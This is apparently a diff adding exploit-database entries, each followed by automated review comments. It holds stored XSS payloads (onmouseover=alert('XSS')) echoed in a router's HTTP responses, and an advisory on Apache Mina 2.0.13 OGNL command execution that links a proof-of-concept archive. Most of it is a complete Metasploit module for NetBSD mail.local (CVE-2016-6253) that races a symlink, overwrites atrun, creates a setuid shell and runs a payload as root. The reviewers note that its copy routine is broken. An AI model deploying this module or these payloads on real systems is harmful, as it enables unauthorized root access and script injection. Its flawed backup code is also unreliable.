#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 10179
(...)
<td>
<input type="radio" name="LocalIdentityType" value="2" onClick="LocalIdentityTypeClicked();" />
<script language="javascript" type="text/javascript">dw(vs_identity_name);</script>
<input type="text" name="LocalIdentity" size="16" maxlength="32" value="abc" onmouseover=alert('XSS') x="y" />
</td>
(...)
<tr>
<td>
<input type="radio" name="RemoteIdentityType" value="2" onClick="RemoteIdentityTypeClicked();">
<script language="javascript" type="text/javascript">dw(vs_identity_name);</script>
<input type="text" name="RemoteIdentity" size="16" maxlength="32" value="abc" onmouseover=alert('XSS') x="y" />
</td>
</tr>
(...)
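Review bot: findings 8, 9, 10 and 13 print the POST body decoded (literal spaces, quotes and angle brackets in NewUser, TodClient, NewContentRule and DdnsUserName), while findings 6, 7, 11, 12 and 14 show it percent-encoded under the same Content-Type: application/x-www-form-urlencoded, so the listings disagree about what was sent on the wire; pick one representation and use it throughout. The response excerpt in finding 8 is also cut off mid-value ("2. user onmouseover=alert('XSS"). Findings 6 to 14 never name their shared cause, although every #2 response shows the stored value echoed without HTML encoding into a value="..." attribute, an option element or a table cell. One sentence stating that, with output encoding as the remediation, would make the section usable by whoever has to fix or filter it.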

@ -0,0 +1,33 @@
Apache Mina 2.0.13 - Remote Command Execution
Abstract
Apache Mina 2.0.13 uses the OGNL library in the “IoSessionFinder” class. Its constructor takes into parameter one OGNL expression. Then this expression is executed when the method “find” is called. This class seems to be only used in the JMX MINA component “IoServiceMBean”. When the IOServiceMBean is exposed trough JMX it is possible to abuse the function to execute an arbitrary command on the server.
Description
The function “find” in the “IoSessionFinder” class executes an arbitrary OGNL expression (Ognl.getValue(….)) defined in its constructor.
Conclusion
This vulnerability shows that Expression languages vulnerabilities are still present in Java libraries and can have a big impact even if it is in this case the vulnerability can only exploited in specific conditions.
Regarding the fix, the Apache Mina team didn't request a CVE neither acknowledged the vulnerability but I confirm that the vulnerability is fixed is the last version.
Timelines
30/03/2016: First email to disclose the vulnerability to the Apache Security Team
31/03/2016: Acknowledgment from the Apache Mina team for the email reception and saying the vulnerability is under investigation
21/05/2016: Email from the Apache Mina saying that they look for possible remediations
12/08/2016: Email from the Apache Mina suggesting a solution
29/08/2016: Email from my side saying that the remediation looks good
30/08/2016: Apache Mina team published the new version fixing the issue.
PS: I have included two archives containing the two proofs of concept.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40384.zip
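Review bot: the Conclusion says the issue "is fixed is the last version" and the timeline ends with "published the new version fixing the issue", but no fixed version number appears anywhere in the file, so a reader running 2.0.13 cannot tell which release to upgrade to; add the release number next to the 30/08/2016 entry. The exposure condition (IoServiceMBean reachable through JMX) is stated only in the Abstract. Repeating it under Description, with a note on how to check whether the MBean is registered, would let operators judge whether they are affected.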

@ -0,0 +1,330 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require "msf/core"
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'NetBSD mail.local Privilege Escalation',
'Description' => %q{
This module attempts to exploit a race condition in mail.local with SUID bit set on:
NetBSD 7.0 - 7.0.1 (verified on 7.0.1)
NetBSD 6.1 - 6.1.5
NetBSD 6.0 - 6.0.6
Successful exploitation relies on a crontab job with root privilege, which may take up to 10min to execute.
},
'License' => MSF_LICENSE,
'Author' =>
[
'h00die <mike@stcyrsecurity.com>', # Module
'akat1' # Discovery
],
'DisclosureDate' => 'Jul 07 2016',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'SessionTypes' => %w{shell meterpreter},
'Privileged' => true,
'Payload' => {
'Compat' => {
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic openssl'
}
},
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DefaultTarget' => 0,
'DefaultOptions' => { 'WfsDelay' => 603 }, #can take 10min for cron to kick
'References' =>
[
[ "URL", "http://akat1.pl/?id=2"],
[ "EDB", "40141"],
[ "CVE", "2016-6253"],
[ "URL", "http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2016-006.txt.asc"]
]
))
register_options([
OptString.new('ATRUNPATH', [true, 'Location of atrun binary', '/usr/libexec/atrun']),
OptString.new('MAILDIR', [true, 'Location of mailboxes', '/var/mail']),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
OptInt.new('ListenerTimeout', [true, 'Number of seconds to wait for the exploit', 603])
], self.class)
end
def exploit
# lots of this file's format is based on pkexec.rb
# direct copy of code from exploit-db
main = %q{
// Source: http://akat1.pl/?id=2
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <stdlib.h>
#include <string.h>
#include <err.h>
#include <sys/wait.h>
#define ATRUNPATH "/usr/libexec/atrun"
#define MAILDIR "/var/mail"
static int
overwrite_atrun(void)
{
char *script = "#! /bin/sh\n"
"cp /bin/ksh /tmp/ksh\n"
"chmod +s /tmp/ksh\n";
size_t size;
FILE *fh;
int rv = 0;
fh = fopen(ATRUNPATH, "wb");
if (fh == NULL) {
rv = -1;
goto out;
}
size = strlen(script);
if (size != fwrite(script, 1, strlen(script), fh)) {
rv = -1;
goto out;
}
out:
if (fh != NULL && fclose(fh) != 0)
rv = -1;
return rv;
}
static int
copy_file(const char *from, const char *dest, int create)
{
char buf[1024];
FILE *in = NULL, *out = NULL;
size_t size;
int rv = 0, fd;
in = fopen(from, "rb");
if (create == 0)
out = fopen(dest, "wb");
else {
fd = open(dest, O_WRONLY | O_EXCL | O_CREAT, S_IRUSR | S_IWUSR);
if (fd == -1) {
rv = -1;
goto out;
}
out = fdopen(fd, "wb");
}
if (in == NULL || out == NULL) {
rv = -1;
goto out;
}
while ((size = fread(&buf, 1, sizeof(buf), in)) > 0) {
if (fwrite(&buf, 1, size, in) != 0) {
rv = -1;
goto out;
}
}
out:
if (in != NULL && fclose(in) != 0)
rv = -1;
if (out != NULL && fclose(out) != 0)
rv = -1;
return rv;
}
int
main()
{
pid_t pid;
uid_t uid;
struct stat sb;
char *login, *mailbox, *mailbox_backup = NULL, *atrun_backup, *buf;
umask(0077);
login = getlogin();
if (login == NULL)
err(EXIT_FAILURE, "who are you?");
uid = getuid();
asprintf(&mailbox, MAILDIR "/%s", login);
if (mailbox == NULL)
err(EXIT_FAILURE, NULL);
if (access(mailbox, F_OK) != -1) {
/* backup mailbox */
asprintf(&mailbox_backup, "/tmp/%s", login);
if (mailbox_backup == NULL)
err(EXIT_FAILURE, NULL);
}
if (mailbox_backup != NULL) {
fprintf(stderr, "[+] backup mailbox %s to %s\n", mailbox, mailbox_backup);
if (copy_file(mailbox, mailbox_backup, 1))
err(EXIT_FAILURE, "[-] failed");
}
/* backup atrun(1) */
atrun_backup = strdup("/tmp/atrun");
if (atrun_backup == NULL)
err(EXIT_FAILURE, NULL);
fprintf(stderr, "[+] backup atrun(1) %s to %s\n", ATRUNPATH, atrun_backup);
if (copy_file(ATRUNPATH, atrun_backup, 1))
err(EXIT_FAILURE, "[-] failed");
/* win the race */
fprintf(stderr, "[+] try to steal %s file\n", ATRUNPATH);
switch (pid = fork()) {
case -1:
err(EXIT_FAILURE, NULL);
/* NOTREACHED */
case 0:
asprintf(&buf, "echo x | /usr/libexec/mail.local -f xxx %s "
"2> /dev/null", login);
for(;;)
system(buf);
/* NOTREACHED */
default:
umask(0022);
for(;;) {
int fd;
unlink(mailbox);
symlink(ATRUNPATH, mailbox);
sync();
unlink(mailbox);
fd = open(mailbox, O_CREAT, S_IRUSR | S_IWUSR);
close(fd);
sync();
if (lstat(ATRUNPATH, &sb) == 0) {
if (sb.st_uid == uid) {
kill(pid, 9);
fprintf(stderr, "[+] won race!\n");
break;
}
}
}
break;
}
(void)waitpid(pid, NULL, 0);
if (mailbox_backup != NULL) {
/* restore mailbox */
fprintf(stderr, "[+] restore mailbox %s to %s\n", mailbox_backup, mailbox);
if (copy_file(mailbox_backup, mailbox, 0))
err(EXIT_FAILURE, "[-] failed");
if (unlink(mailbox_backup) != 0)
err(EXIT_FAILURE, "[-] failed");
}
/* overwrite atrun */
fprintf(stderr, "[+] overwriting atrun(1)\n");
if (chmod(ATRUNPATH, 0755) != 0)
err(EXIT_FAILURE, NULL);
if (overwrite_atrun())
err(EXIT_FAILURE, NULL);
fprintf(stderr, "[+] waiting for atrun(1) execution...\n");
for(;;sleep(1)) {
if (access("/tmp/ksh", F_OK) != -1)
break;
}
/* restore atrun */
fprintf(stderr, "[+] restore atrun(1) %s to %s\n", atrun_backup, ATRUNPATH);
if (copy_file(atrun_backup, ATRUNPATH, 0))
err(EXIT_FAILURE, "[-] failed");
if (unlink(atrun_backup) != 0)
err(EXIT_FAILURE, "[-] failed");
if (chmod(ATRUNPATH, 0555) != 0)
err(EXIT_FAILURE, NULL);
fprintf(stderr, "[+] done! Don't forget to change atrun(1) "
"ownership.\n");
fprintf(stderr, "Enjoy your shell:\n");
execl("/tmp/ksh", "ksh", NULL);
return 0;
}
}
# patch in our variable maildir and atrunpath
main.gsub!(/#define ATRUNPATH "\/usr\/libexec\/atrun"/,
"#define ATRUNPATH \"#{datastore["ATRUNPATH"]}\"")
main.gsub!(/#define MAILDIR "\/var\/mail"/,
"#define MAILDIR \"#{datastore["MAILDIR"]}\"")
executable_path = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
payload_file = "#{rand_text_alpha(8)}"
payload_path = "#{datastore["WritableDir"]}/#{payload_file}"
vprint_status("Writing Payload to #{payload_path}")
# patch in to run our payload as part of ksh
main.gsub!(/execl\("\/tmp\/ksh", "ksh", NULL\);/,
"execl(\"/tmp/ksh\", \"ksh\", \"#{payload_path}\", NULL);")
write_file(payload_path, payload.encoded)
cmd_exec("chmod 555 #{payload_path}")
register_file_for_cleanup(payload_path)
print_status "Writing exploit to #{executable_path}.c"
# clean previous bad attempts to prevent c code from exiting
rm_f executable_path
rm_f '/tmp/atrun'
whoami = cmd_exec('whoami')
rm_f "/tmp/#{whoami}"
write_file("#{executable_path}.c", main)
print_status("Compiling #{executable_path}.c via gcc")
output = cmd_exec("/usr/bin/gcc -o #{executable_path}.out #{executable_path}.c")
output.each_line { |line| vprint_status(line.chomp) }
print_status('Starting the payload handler...')
handler({})
print_status("Executing at #{Time.now}. May take up to 10min for callback")
output = cmd_exec("chmod +x #{executable_path}.out; #{executable_path}.out")
output.each_line { |line| vprint_status(line.chomp) }
# our sleep timer
stime = Time.now.to_f
until session_created? || stime + datastore['ListenerTimeout'] < Time.now.to_f
Rex.sleep(1)
end
print_status("#{Time.now}")
register_file_for_cleanup(executable_path)
register_file_for_cleanup("#{executable_path}.out")
print_status("Remember to run: chown root:wheel #{datastore["ATRUNPATH"]}")
end
end
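Review bot: in copy_file() the copy loop calls fwrite(&buf, 1, size, in) and treats a non-zero return as failure, so nothing is ever written to out and the backups in /tmp hold no data; the later copy_file(atrun_backup, ATRUNPATH, 0) therefore cannot put the original atrun back on the tested host. The write should go to out and its return value should be compared with size. On cleanup, register_file_for_cleanup is called for executable_path, which is never written, but not for "#{executable_path}.c", and the setuid /tmp/ksh created by the replacement atrun script is not registered either. The final print_status mentions only the atrun ownership, so the Description should list every change the module leaves behind (setuid /tmp/ksh, atrun content and owner, files under WritableDir) so the host owner can revert them.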